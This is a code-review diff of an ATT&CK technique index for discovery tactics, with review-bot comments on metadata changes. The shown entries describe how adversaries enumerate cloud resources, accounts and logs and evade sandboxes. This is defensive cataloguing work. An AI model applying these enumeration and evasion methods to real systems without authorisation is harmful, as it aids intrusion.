description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests:
- name: AWS - EC2 Enumeration from Cloud Instance
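Review bot: `description`, `x_mitre_detection`, `kill_chain_phases`, `x_mitre_data_sources`, `x_mitre_deprecated` and `revoked` are all removed for T1580 here with no matching `+` lines in the visible part of the hunk; since the head of the hunk is cut off, please confirm they are re-emitted in the reordered block above, otherwise the technique loses its detection guidance and its kill-chain phase. The one substantive reference change is the Mandiant M-Trends 2020 URL moving from `https://content.fireeye.com/m-trends/rpt-m-trends-2020` to the `mandiant.com` PDF, which looks correct.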
@@ -103374,7 +104068,7 @@ discovery:
fi
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
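Review bot: `modified` for T1217 moves backwards, from `2023-05-09T14:00:00.188Z` to `2023-04-16T14:24:40.625Z`, and the same regression appears below for T1482, T1049, T1619, T1069.001, T1614.001 and T1012. Every removed value shares the `T14:00:00.188Z` time of day, so the old file appears to have carried a release-wide stamp while the new one carries each STIX object's own `modified` value; that is a reasonable change, but it should be stated in the PR description so that dates moving backwards are not read as a regeneration from a stale bundle.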
@@ -103428,7 +104122,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests:
- name: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux
@@ -103657,7 +104350,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
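Review bot: the replacement `{{LinkById|T1059.008}` in `x_mitre_detection` has two opening braces and one closing brace, and like the `(LinkById: T1059.008)` it replaces it is unrendered template markup, while the other links in the same sentence are plain markdown (`[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)`). If this text is post-processed from upstream, the link rewriter should handle this form; otherwise emit it as `[Network Device CLI](https://attack.mitre.org/techniques/T1059/008)` so the detection text reads consistently.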
@@ -103695,7 +104388,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests:
- name: System Network Configuration Discovery on Windows
@@ -103912,7 +104604,7 @@ discovery:
name: command_prompt
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -103939,14 +104631,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
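Review bot: replacing `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` changes the platform vocabulary this file is filtered on; any index or tooling that selects techniques by the old platform strings will now silently return nothing for T1087 (and for T1087.004 and T1201 further down, which get the same rename). Please confirm the platform-keyed index generation was updated in the same change, and call the vocabulary change out in the PR description since it is a breaking change for downstream consumers.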
@@ -103975,7 +104666,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
@@ -104035,7 +104725,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
@@ -104054,7 +104744,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests:
- name: Windows - Discover domain trusts with dsquery
@@ -104323,7 +105012,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests:
- name: File and Directory Discovery (cmd.exe)
@@ -104531,7 +105219,7 @@ discovery:
elevation_required: false
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -104608,7 +105296,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery
@@ -104708,35 +105395,7 @@ discovery:
#{SharpView} $syntax -}
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
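Review bot: the T1497 object is emitted with its keys in a different order (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are removed here and re-added further down), so a technique whose substantive changes are a `modified` timestamp, a spec version bump, a retrieval date and an added `revoked: false` produces hunks of around 70 lines. A serializer with a stable key order would keep these diffs limited to semantic changes and make the reference edits, such as the Deloitte URL gaining an `/edit` suffix, reviewable at a glance.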
@@ -104748,6 +105407,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -104758,8 +105421,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -104769,9 +105438,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
@@ -104804,7 +105492,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -104822,7 +105510,6 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests:
- name: AWS S3 Enumeration
@@ -104851,7 +105538,7 @@ discovery:
elevation_required: false
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -104859,11 +105546,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
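Review bot: `x_mitre_detection` stays `''` (two lines below the new contributor) while the description gains a paragraph on adversaries monitoring logs in real time to track incident response. If detection text is maintained in this repository rather than mirrored verbatim from upstream, this technique is a candidate for guidance on auditing reads and bulk exports of event logs and SIEM data, which is exactly the activity the new paragraph describes.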
@@ -104874,7 +105564,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -104888,6 +105578,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -104907,7 +105601,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests:
- name: Get-EventLog To Enumerate Windows Security Log
@@ -104943,51 +105636,7 @@ discovery:
name: command_prompt
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
@@ -105009,19 +105658,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
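Review bot: `source_name: Google Cloud - IAM Servie Accounts List API` carries the `Servie` typo over from the removed block. Because `source_name` is the key that `(Citation: ...)` markers in the description resolve against, it must not be corrected locally without changing the matching marker; better to fix it upstream and let the regeneration pick it up. Dropping `x_mitre_permissions_required: - User` with no replacement while bumping to `x_mitre_attack_spec_version: 3.2.0` is fine on its own, but note that T1614.001 below still keeps that field, so the two objects end up at different schema levels; please confirm that is intended.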
@@ -105092,7 +105783,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests:
- name: Process Discovery - ps
@@ -105258,41 +105948,7 @@ discovery:
elevation_required: false
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -105316,6 +105972,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -105326,9 +105985,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -105338,12 +106002,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
